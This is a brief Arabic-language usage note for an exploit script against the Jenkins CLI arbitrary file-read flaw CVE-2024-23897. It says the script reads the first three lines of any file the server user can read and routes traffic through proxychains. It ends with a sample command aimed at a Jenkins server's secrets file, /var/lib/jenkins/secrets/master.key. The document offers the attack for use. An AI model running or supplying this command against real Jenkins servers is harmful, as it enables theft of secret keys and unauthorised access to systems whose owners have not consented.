
Jenkins CLI قراءة عشوائية (CVE-2024-23897 ينطبق على الإصدارات الأقل من 2.442 و LTS 2.426.3)
اقرأ أول 3 أسطر من أي ملف لديه إذن قراءة للمستخدم الحالي على النظام. النص البرمجي يستخدم proxychains داخليًا.
الاستخدام:
python CVE-2024-23897.py <jenkins-cli.jar path> <target URI> <file path>
مثال:
python CVE-2024-23897.py /mnt/hgfs/Share/jenkins-cli.jar http://10.10.14.8:8080/ /var/lib/jenkins/secrets/master.key